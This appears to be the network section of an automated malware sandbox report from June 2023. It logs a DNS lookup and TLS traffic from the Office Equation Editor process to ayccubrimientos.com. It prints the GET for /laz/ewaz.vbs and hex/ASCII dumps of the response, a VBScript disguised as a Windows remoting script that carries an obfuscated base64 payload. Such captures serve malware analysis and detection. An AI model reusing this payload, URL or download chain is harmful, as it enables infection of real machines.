                  Data Raw:93 34 c0 01 02 19 a3 a0 f2 77 01 08 a3 e9 bd a1 b2 7b a2 81 c5 e4 0a ca 5d 8b 4d b7 8b 31 ba 83 31 f4 09 81 ea d3 c9 ad 09 8b 2a 56 ff d5 05 d1 8c bb 80 2d cc 31 84 80 ff e0 a2 5f 41 00 8f 4c 40 5d 99 dc 83 57 be fa 49 06 c2 66 49 03 98 97 52 84 e5 aa 16 16 91 58 25 ea 31 19 a8 f5 2a 54 33 66 c3 bb 9d 41 23 55 89 87 70 10 bd 64 ef 3f 90 9e f4 fc 2a cb 06 92 9a 31 e2 50 50 8a 76 e9
                  TimestampSource PortDest PortSource IPDest IP
                  Jun 21, 2023 06:25:40.138149977 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:40.138211012 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:40.138288975 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:40.170501947 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:40.170542955 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:40.584856033 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:40.584981918 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:40.598315954 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:40.598336935 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:40.598936081 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:40.599003077 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:40.901947975 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:40.944309950 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.135942936 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.136073112 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.136096001 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.136162996 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.334362984 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.334399939 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.334481955 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.334517956 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.334547997 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.334564924 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.334594965 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.334609032 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.335148096 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.335294008 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.335295916 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.335325003 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.335360050 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.335445881 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.335655928 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.534610987 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.534800053 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.534809113 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.534846067 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.534929037 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.535105944 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.535280943 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.535406113 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.535424948 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.535501957 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.535561085 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.535657883 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.535722971 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.535816908 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.535945892 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.729000092 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.729187965 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.729214907 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.729259014 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.729296923 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.729342937 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.729640007 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.746474028 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.746651888 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.746716976 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.746773005 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.746813059 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.746839046 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.746865034 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.746978998 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.747103930 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.747168064 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.747273922 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.747371912 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.747471094 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.747498989 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.747644901 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.747776031 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.747791052 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.747826099 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.747895002 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.748059034 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.748176098 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.748203993 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.748317003 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.748471975 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.748600960 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.748621941 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.748723984 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.748953104 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.926630020 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.926769018 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.926768064 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.926815033 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.926856041 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.926904917 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.926999092 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.927891016 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.928023100 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.928040028 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.928061962 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.928098917 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.928122997 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.928276062 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.953639030 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.953788996 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.953816891 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.953859091 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.953917027 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.953953028 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.954178095 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.954282999 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.954308033 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.954397917 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.954549074 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.954663992 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.954672098 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.954696894 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.954750061 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.954926014 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.955009937 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.955046892 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.955122948 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.955302954 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.955395937 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.955430984 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.955512047 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.955589056 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.955667019 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.955756903 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.955791950 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.955895901 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.956013918 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.956140041 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.956187010 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.956217051 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.956257105 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.956362009 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.956461906 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.956558943 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.956631899 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.956758022 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.956948996 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.957061052 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.957114935 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.957242966 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.957415104 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.957518101 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.957587004 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.957686901 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.957835913 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.957945108 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.957998037 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:41.958096981 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:41.963072062 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:42.136353970 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:42.136451960 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:42.136533022 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:42.136568069 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:42.136584044 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:42.136629105 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:42.136662006 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:42.136728048 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:42.136734009 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:42.136776924 CEST44349183190.90.160.170192.168.2.22
                  Jun 21, 2023 06:25:42.136779070 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:42.136940002 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:42.136965990 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:42.140240908 CEST49183443192.168.2.22190.90.160.170
                  Jun 21, 2023 06:25:42.140307903 CEST44349183190.90.160.170192.168.2.22
                  TimestampSource PortDest PortSource IPDest IP
                  Jun 21, 2023 06:25:39.881100893 CEST5013453192.168.2.228.8.8.8
                  Jun 21, 2023 06:25:40.122481108 CEST53501348.8.8.8192.168.2.22
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Jun 21, 2023 06:25:39.881100893 CEST192.168.2.228.8.8.80xfc29Standard query (0)ayccubrimientos.comA (IP address)IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Jun 21, 2023 06:25:40.122481108 CEST8.8.8.8192.168.2.220xfc29No error (0)ayccubrimientos.com190.90.160.170A (IP address)IN (0x0001)false
                  • ayccubrimientos.com
                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.2249183190.90.160.170443C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  TimestampkBytes transferredDirectionData
                  2023-06-21 04:25:40 UTC0OUTGET /laz/ewaz.vbs HTTP/1.1
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: ayccubrimientos.com
                  Connection: Keep-Alive
                  2023-06-21 04:25:41 UTC0INHTTP/1.1 200 OK
                  Connection: close
                  content-type: text/vbscript
                  last-modified: Mon, 19 Jun 2023 06:36:26 GMT
                  accept-ranges: bytes
                  content-length: 411960
                  date: Wed, 21 Jun 2023 04:25:40 GMT
                  server: LiteSpeed
                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                  2023-06-21 04:25:41 UTC0INData Raw: ff fe 20 00 20 00 20 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 4f 00 6e 00 20 00 45 00 72 00 72 00 6f 00 72 00 20 00 52 00 65 00 73 00 75 00 6d 00 65 00 20 00 4e 00 65 00 78 00 74 00 0d 00 0a 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 27 00 20 00 20 00 20 00 20 00 0d 00 0a 00 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 47 00 65 00 74 00 53 00 75 00 66 00 66 00 69 00 78 00 28 00 72 00 65 00 73 00 55 00 72 00 69 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 41 00 53 00 53 00 45 00 52 00 54 00 42 00 4f 00 4f 00 4c 00 20 00 4c 00 65 00 6e 00 28 00 72 00 65 00 73 00 55 00 72 00 69 00 29 00 20 00 3c 00 3e 00 20 00 30 00 2c
                  Data Ascii: On Error Resume Next''''''''''''''''''''' private function GetSuffix(resUri) ASSERTBOOL Len(resUri) <> 0,
                  2023-06-21 04:25:41 UTC1INData Raw: 00 0a 00 50 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 46 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 51 00 75 00 69 00 63 00 6b 00 43 00 6f 00 6e 00 66 00 69 00 67 00 52 00 65 00 6d 00 6f 00 74 00 69 00 6e 00 67 00 28 00 73 00 65 00 73 00 73 00 69 00 6f 00 6e 00 2c 00 20 00 63 00 6d 00 64 00 6c 00 69 00 6e 00 65 00 4f 00 70 00 74 00 69 00 6f 00 6e 00 73 00 2c 00 20 00 73 00 65 00 72 00 76 00 69 00 63 00 65 00 4f 00 6e 00 6c 00 79 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 44 00 69 00 6d 00 20 00 61 00 6e 00 61 00 6c 00 79 00 73 00 69 00 73 00 49 00 6e 00 70 00 75 00 74 00 58 00 6d 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 44 00 69 00 6d 00 20 00 61 00 6e 00 61 00 6c 00 79 00 73 00 69 00 73 00 4f 00 75 00 74 00 70 00 75 00 74 00 58 00 6d 00
                  Data Ascii: Private Function QuickConfigRemoting(session, cmdlineOptions, serviceOnly) Dim analysisInputXml Dim analysisOutputXm
                  2023-06-21 04:25:41 UTC16INData Raw: 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 49 00 66 00 20 00 63 00 75 00 72 00 72 00 65 00 6e 00 74 00 45 00 6c 00 65 00 6d 00 65 00 6e 00 74 00 2e 00 6e 00 6f 00 64 00 65 00 54 00 79 00 70 00 65 00 20 00 3d 00 20 00 4e 00 4f 00 44 00 45 00 5f 00 54 00 45 00 58 00 54 00 20 00 54 00 68 00 65 00 6e 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 47 00 65 00 74 00 45 00 6c 00 65 00 6d 00 65 00 6e 00 74 00 42 00 79 00 58 00 70 00 61 00 74 00 68 00 20 00 3d 00 20 00 63 00 75 00 72 00 72 00 65 00 6e 00 74 00 45 00 6c 00 65 00 6d 00 65 00 6e 00 74 00 2e 00 74 00 65 00 78 00 74 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 45 00 6c 00 73 00 65 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00
                  Data Ascii: If currentElement.nodeType = NODE_TEXT Then GetElementByXpath = currentElement.text Else
                  2023-06-21 04:25:41 UTC32INData Raw: 00 68 00 20 00 3d 00 20 00 63 00 6d 00 64 00 6c 00 69 00 6e 00 65 00 4f 00 70 00 74 00 69 00 6f 00 6e 00 73 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 46 00 52 00 41 00 47 00 4d 00 45 00 4e 00 54 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 65 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 20 00 20 00 20 00 20 00 69 00 66 00 28 00 63 00 6d 00 64 00 6c 00 69 00 6e 00 65 00 4f 00 70 00 74 00 69 00 6f 00 6e 00 73 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 44 00 49 00 41 00 4c 00 45 00 43 00 54 00 29 00 29 00 20 00 74 00 68 00 65 00 6e 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 72 00 65 00 73 00
                  Data Ascii: h = cmdlineOptions.Argument(NPARA_FRAGMENT) end if if(cmdlineOptions.ArgumentExists(NPARA_DIALECT)) then res
                  2023-06-21 04:25:41 UTC48INData Raw: 00 20 00 20 00 64 00 69 00 6d 00 20 00 63 00 6f 00 6e 00 4f 00 70 00 74 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 73 00 65 00 73 00 73 00 69 00 6f 00 6e 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 61 00 75 00 74 00 68 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 6e 00 63 00 72 00 79 00 70 00 74 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 70 00 77 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 74 00 6f 00 75 00 74 00 0d 00 0a 00 20 00 20 00 20 00 20 00 27 00 20 00 70 00 72 00 6f 00 78 00 79 00
                  Data Ascii: dim conOpt dim session dim authVal dim encodingVal dim encryptVal dim pw dim tout ' proxy
                  2023-06-21 04:25:41 UTC64INData Raw: 00 20 00 56 00 41 00 4c 00 5f 00 50 00 52 00 4f 00 58 00 59 00 5f 00 41 00 55 00 54 00 4f 00 44 00 45 00 54 00 45 00 43 00 54 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 41 00 63 00 63 00 65 00 73 00 73 00 54 00 79 00 70 00 65 00 20 00 3d 00 20 00 63 00 6f 00 6e 00 4f 00 70 00 74 00 2e 00 50 00 72 00 6f 00 78 00 79 00 41 00 75 00 74 00 6f 00 44 00 65 00 74 00 65 00 63 00 74 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 63 00 61 00 73 00 65 00 20 00 56 00 41 00 4c 00 5f 00 50 00 52 00 4f 00 58 00 59 00 5f 00 4e 00 4f 00 5f 00 50 00 52 00 4f 00 58 00 59 00 5f 00 53 00 45 00 52 00 56 00 45 00 52 00 0d 00 0a 00 20 00 20 00
                  Data Ascii: VAL_PROXY_AUTODETECT proxyAccessType = conOpt.ProxyAutoDetect case VAL_PROXY_NO_PROXY_SERVER
                  2023-06-21 04:25:41 UTC80INData Raw: 00 6c 00 28 00 73 00 74 00 72 00 65 00 61 00 6d 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 45 00 6e 00 64 00 20 00 49 00 66 00 0d 00 0a 00 0d 00 0a 00 50 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 53 00 75 00 62 00 20 00 48 00 65 00 6c 00 70 00 54 00 6f 00 70 00 69 00 63 00 28 00 73 00 74 00 72 00 65 00 61 00 6d 00 2c 00 20 00 6c 00 61 00 62 00 65 00 6c 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 4e 00 4c 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 4e 00 4c 00 20 00 3d 00 20 00 76 00 62 00 4e 00 65 00 77 00 4c 00 69 00 6e 00 65 00 0d 00 0a 00 20 00 20 00 20 00 20 00 44 00 69 00 6d 00 20 00 73 00 65 00 70 00 65 00 72 00 61 00 74 00 6f 00 72 00 0d 00 0a 00 20 00 20 00 20 00 20 00 73 00 65 00 70 00 65 00 72 00 61 00 74 00 6f 00
                  Data Ascii: l(stream) End IfPrivate Sub HelpTopic(stream, label) dim NL NL = vbNewLine Dim seperator seperato
                  2023-06-21 04:25:41 UTC96INData Raw: 00 76 00 64 00 43 00 44 00 53 00 78 00 78 00 56 00 6b 00 46 00 66 00 69 00 5a 00 53 00 44 00 53 00 78 00 78 00 56 00 22 00 20 00 0d 00 0a 00 4c 00 59 00 63 00 78 00 50 00 75 00 55 00 50 00 4b 00 50 00 63 00 78 00 55 00 70 00 70 00 42 00 71 00 44 00 47 00 4c 00 77 00 42 00 55 00 4b 00 4b 00 57 00 49 00 79 00 70 00 49 00 63 00 70 00 50 00 50 00 44 00 50 00 58 00 75 00 49 00 20 00 3d 00 20 00 4c 00 59 00 63 00 78 00 50 00 75 00 55 00 50 00 4b 00 50 00 63 00 78 00 55 00 70 00 70 00 42 00 71 00 44 00 47 00 4c 00 77 00 42 00 55 00 4b 00 4b 00 57 00 49 00 79 00 70 00 49 00 63 00 70 00 50 00 50 00 44 00 50 00 58 00 75 00 49 00 20 00 26 00 20 00 22 00 6b 00 46 00 66 00 79 00 64 00 57 00 34 00 67 00 61 00 57 00 34 00 67 00 52 00 45 00 39 00 54 00 49 00 47 00 31 00
                  Data Ascii: vdCDSxxVkFfiZSDSxxV" LYcxPuUPKPcxUppBqDGLwBUKKWIypIcpPPDPXuI = LYcxPuUPKPcxUppBqDGLwBUKKWIypIcpPPDPXuI & "kFfydW4gaW4gRE9TIG1
                  2023-06-21 04:25:41 UTC112INData Raw: 00 4c 00 59 00 63 00 78 00 50 00 75 00 55 00 50 00 4b 00 50 00 63 00 78 00 55 00 70 00 70 00 42 00 71 00 44 00 47 00 4c 00 77 00 42 00 55 00 4b 00 4b 00 57 00 49 00 79 00 70 00 49 00 63 00 70 00 50 00 50 00 44 00 50 00 58 00 75 00 49 00 20 00 26 00 20 00 22 00 77 00 48 00 53 00 68 00 4b 00 41 00 41 00 41 00 47 00 4b 00 41 00 49 00 41 00 41 00 43 00 73 00 74 00 45 00 67 00 6c 00 79 00 55 00 77 00 49 00 41 00 63 00 44 00 53 00 78 00 78 00 56 00 6b 00 46 00 66 00 30 00 6f 00 53 00 67 00 41 00 41 00 22 00 20 00 0d 00 0a 00 4c 00 59 00 63 00 78 00 50 00 75 00 55 00 50 00 4b 00 50 00 63 00 78 00 55 00 70 00 70 00 42 00 71 00 44 00 47 00 4c 00 77 00 42 00 55 00 4b 00 4b 00 57 00 49 00 79 00 70 00 49 00 63 00 70 00 50 00 50 00 44 00 50 00 58 00 75 00 49 00 20 00
                  Data Ascii: LYcxPuUPKPcxUppBqDGLwBUKKWIypIcpPPDPXuI & "wHShKAAAGKAIAACstEglyUwIAcDSxxVkFf0oSgAA" LYcxPuUPKPcxUppBqDGLwBUKKWIypIcpPPDPXuI
                  2023-06-21 04:25:41 UTC128INData Raw: 00 53 00 78 00 78 00 56 00 6b 00 46 00 66 00 6e 00 4a 00 47 00 44 00 53 00 78 00 78 00 56 00 6b 00 46 00 66 00 22 00 20 00 0d 00 0a 00 4c 00 59 00 63 00 78 00 50 00 75 00 55 00 50 00 4b 00 50 00 63 00 78 00 55 00 70 00 70 00 42 00 71 00 44 00 47 00 4c 00 77 00 42 00 55 00 4b 00 4b 00 57 00 49 00 79 00 70 00 49 00 63 00 70 00 50 00 50 00 44 00 50 00 58 00 75 00 49 00 20 00 3d 00 20 00 4c 00 59 00 63 00 78 00 50 00 75 00 55 00 50 00 4b 00 50 00 63 00 78 00 55 00 70 00 70 00 42 00 71 00 44 00 47 00 4c 00 77 00 42 00 55 00 4b 00 4b 00 57 00 49 00 79 00 70 00 49 00 63 00 70 00 50 00 50 00 44 00 50 00 58 00 75 00 49 00 20 00 26 00 20 00 22 00 67 00 44 00 53 00 78 00 78 00 56 00 6b 00 46 00 66 00 77 00 47 00 43 00 68 00 4b 00 41 00 41 00 41 00 47 00 4b 00 41 00
                  Data Ascii: SxxVkFfnJGDSxxVkFf" LYcxPuUPKPcxUppBqDGLwBUKKWIypIcpPPDPXuI = LYcxPuUPKPcxUppBqDGLwBUKKWIypIcpPPDPXuI & "gDSxxVkFfwGChKAAAGKA
